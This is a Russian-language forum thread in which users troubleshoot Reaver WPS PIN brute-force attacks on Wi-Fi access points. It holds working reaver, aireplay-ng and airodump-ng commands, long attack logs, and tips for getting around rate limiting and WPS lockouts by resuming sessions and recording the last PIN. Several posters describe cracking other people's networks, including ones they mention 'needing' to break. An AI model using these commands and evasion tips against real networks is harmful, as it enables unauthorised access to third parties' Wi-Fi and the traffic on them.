Уязвимость в протоколе Wi-Fi Protected Setup

сигнал от точки это что?
вот данные с airodump'a (его я отключаю во время работы ривера)

 

Попробуй так:

Code:

reaver -i mon0 -b <target_mac> -vv -d 0 -S -w

Если будут изменения какие-то - пиши... Пока идей никаких, будем пробовать методом тыка...

 

Как ты описал

ЗЫ: ща тоже самое попробовал с aireplay - результата нет

Code:

reaver -i mon0 -b 08:86:3B:80:9F:5C -vv -d 0 -S -w Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> [?] Restore previous session for 08:86:3B:80:9F:5C? [n/Y] y [+] Restored previous session [+] Waiting for beacon from 08:86:3B:80:9F:5C [+] Switching mon0 to channel 1 [+] Associated with 08:86:3B:80:9F:5C (ESSID: belkin.f5c) [+] Trying pin 01845679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response ************************ [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response ************************ [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Sending EAPOL START request [+] Received M3 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Switching mon0 to channel 1 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response ************************ [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response ************************ [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Switching mon0 to channel 2 [+] Switching mon0 to channel 3 [+] Switching mon0 to channel 1 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] 1.76% complete @ 2012-07-31 14:44:04 (0 seconds/pin) [+] Trying pin 01845679 [+] Sending EAPOL START request 

 

picat, тогда можно попробовать искусственно занизить мощность твоего адаптера/найти место, где сигнал будет не такой сильный, да и вообще перебор пойдёт... Иногда нужно банально передвинуть бук на пару десятков сантиметров в сторону, чтобы ривер заработал - СВЧ-диапазон, мать его) Для второго случая можно погулять по дому с буком и найти место, где будет сигнал в районе -65 dBm, а для первого случая попробуй что-то вроде

Code:

iwconfig wlan0 txpower 10

. Поиграй с параметром txpower - он задаёт максимальную выходную мощность беспроводного адаптера. Иногда точка захлёбывается сигналом и уходит в lock, когда сигнал слишком уж рьяный)))

Апдейт: А вообще, перед всем, что я написал в посте выше, попробуй убрать -d 0. Иногда точка не успевает обрабатывать запросы, которыми её заваливает клиентская машинка...

 

H3L1X, забыл сказать, я txpower ставил Боливийские 30 - возможно причина в этом. Ща попробую по дефолту или даже на 10. Отпишусь, и благодарю за содействие

 

Спасибо, Всё легко и просто.Без лишнего мусора.

 

да ничего там не регулируеться в бэктреке, поставьте iwconfig wlan0 txpower 0 и удивляйтесь что всё работает...

 

Может кто помочь

Когда сканирую точки выдает, 3 сети, из них все 3 WPS locked ( NO )

Начинаю взлом первой TP-link_FRESH, проверяет 6 пинов, дале появляется
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

ну и так без конца дето на сутку.

Если в ето время включить мониторинг то уже показывает

тоесть WPS locked с NO меняется на YES, через сутку обратно.

Что делать ?

 

А ничего. Раз в сутки запускать ривер, продолжать сохраненную сессию, шажок за шажком.... У самого таких 2 точки - ч-з 10 пинов точки уходят в лок.

 

бывает и такое, только я после горького опыта стал записывать последний пин на бумаге, в случае не возможности продолжения сессии вбивал продолжение по маске.

 

как имено если он блокируется полностью на сутку ?


Также может кто поможет.
У меня второй адаптер TP-link TL-WN7200ND, BT5 R1, драйвер показывает rt2800usb. Мониторить он мониторит WPS. Но как только включаю подбор пинов к какой нибудь сети так процесс буксует на 1 пине, и куча ошибок. Пробовал разные сети, по разному прописывал.

Вот лог с ВТ:

Code:

[+] Switching mon0 to channel 4
[+] Associated with F4:EC:38:AF:A2:96 (ESSID: Microsoft)
[+] Trying pin 12345670
[+] Switching mon0 to channel 4
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin

Что делать ? дело в драйвере ? если да, так какой ставить и как именно ?
А то на родном адаптере ноута сломал 1 точку за 5 чесов, а на етом просто 0. Никак, а по дальности все точки которые надо ломать родной не ловит или ловит плохо.

 

Ghosttt
открой еще одну вкладку терминала и

Code:

aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX -e XXX mon0 --ignore-negative-one

 

У меня вывод, который ты даёшь, обычно бывает при низком/неустойчивом сигнале. Поэтому нужно к точке подбираться... для начала. Либо мощность передатчика твоего задирать, но это - 50/50 шанс, что поможет. Если программа точку видит и ассоциируется с ней - значит, карточка и софтина работают корректно, и надо где-то ещё искать причину... Я бы грешил на силу сигнала в данном случае.

 

суть в том что я пробовал разные точки, результат 1.
Даже пробую точку к которой 2 дня назад добыл пин к ВПС адаптером встроенным в ноут, результата 0
Traing pin 12345670.
далее куча ошибок и опять Traing pin 12345670. потом пишет прогрес 0.00% и по второму кругу...

не понимаю в чем проблема...адаптер Tp-link TL-WN7200ND вроде должен работать так как чип там rl3070 а на деле толку с WPS 0.
Может у ково такой адаптер посоветуйте.

 

У меня точь-в-точь тако адаптер, reaver на нем работает отлично. Одну точку поломал, 2 в работе (медленно идут, потому, что в лок уходят на сутки после 10 попыток - защита такая), а вцелом доволен вполне.
А какую ОС пользуешь? Может дровишки шалят? Или firmware в системе старая?

 

У меня тоже такой чип под ви фи слакс 64-2 работает, но есть точки которые просто не подбираются не смотря на всякие уловки, есть netgear которая останавливается на 99989989 пишет что 99.9% и все, может здесь пины куда выкладывать к разным макам, чтобы проверять руками а?

 

пока никак наверно, если только терпением, я имел ввиду что после трех недельного брута примерно 80%, на следующий день отказался продолжать сессию (логи тоже были пусты), вот где не приятный сюрприз был, после этого случая если надо было подобрать пин к точке с такими симптомами, последний записывал на бумаге на всяк случай (как оказалось не зря, по крайней мере в моем случае). точка в конце концов сдалась конечно имхо конечно, но скоро халявный WPS прикрутят, с каждым разом все больше точек появляется без оного, спасибо системным администраторам обитающим по этим форумам. пардон за флуд, можете удалить

 

Ок опишу все как было.
ОС ноутбуку 7, драйвер ТП-линковский с диска, пробовал от Альфы но мне показалось что стало ловить менше точек, переставил назад родной.
Запускаю reaver через usb с загрузочной флешки.

1) airslax_1.2 там reaver 1.4 вшит, в папку модулс перепробывал много драйверов, мониторинг пошел после передьоргивания кабеля адаптера на драйвере rt2x00. Но после начала подбора пина выдайот что сбой присоеденения к точке. Родной адаптер ноутбука Broadcom прекрасно работает там же на драйвере b43, легко подобрал пин и сломал пароль к 1 точке за 5 с лишним часов.

После, решыл что airslax плохо ладит с адаптером, решыл по старинке использовать провереный ВТ5.

2) BT5R1-GNOME-32, драйвер там автоматом показывает rt2800usb, установил reaver-1.4 все как положено.
wash -i mon0 -C -s показывает несколько сетей.
после беру например ту же сеть что уже сломал ранше, на ней перебор был 4 пина\сек, тоесть сигнал хорошый, а поскольку ТП линк сильнее так вопше должно было летать.
Прописываю:
reaver -i mon0 -b XX:XX:XX:XX:XX -vv
или
reaver -i mon0 -b XX:XX:XX:XX:XX -vv --dh-small

и все, начинает буксувать на 1 пине = ступор.

Пробывал как выше советовали в 2 окне прописывать:
aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX -e XXX mon0 --ignore-negative-one

выдает типа: mon0 сечас на канале 7, а точка которую атакую на канале 4. бла бла бла ступор. Если ето важно скопирую кину сюда лог.
И в итоге толку 0.

какой драйвер ты используеш ? Тоесть бросаеш в папку модулс ?

 

Если aireplay ругается на канал, нужно сначала запустить airodump с требуемым каналом, прим.

Code:

airodump-ng mon0 -c 4 

Потом в другой вкладке запустить aireplay. После успешной ассоциации airodump следует отключить (он мешает корректной работе ривера). И далее запускаем ривер с включенным aireplay.
Незнаю с чем связано, но у меня половина точек работают только с aireplay (причем при использовании aireplay существует вероятность пропустить правильный ПИН (у меня из 6 точек в 2х пропустил- пришлось заново))

 

Ghosttt
Еcть такой же адаптер ,замечателно работает с reaver-ом,но не в BT5R1,не в бейни а в wifislax 4.1 и xiaopan-0.3.8 http://www.wifislax.com/category/download/nuevas-versiones
http://www.mediafire.com/?l0qrw56rvold50f и что интересно работает он там через minidwep-gtk(клякса),через инфлятор не пашет,с чем это связано не знаю.